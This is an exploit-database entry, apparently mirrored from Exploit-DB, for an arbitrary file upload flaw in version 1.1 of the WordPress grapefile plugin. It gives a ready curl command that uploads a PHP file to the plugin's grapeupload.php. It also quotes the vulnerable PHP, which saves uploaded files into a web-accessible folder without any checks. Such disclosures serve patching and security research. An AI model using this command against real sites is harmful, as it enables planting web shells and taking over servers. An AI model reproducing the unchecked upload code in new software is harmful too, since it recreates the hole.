[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin grapefile 1.1 - Arbitrary File Upload

Author: Hrvoje Spoljar
type: webapps
platform: php
port: 
date_added: 2011-08-31 
date_updated: 2011-08-31 
verified: 0 
codes:  
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgrapefile.zip
Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link:http://wordpress.org/extend/plugins/grapefile/

PoC:
curl -F "userfile=@mycode.php"
http://domain.tld/wp-content/plugins/grapefile/grapeupload.php

File(s): grapeupload.php  grapeupload2.php  grapeupload3.php
grapeupload4.php
Vulnerable code:
$uploaddir =
$_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.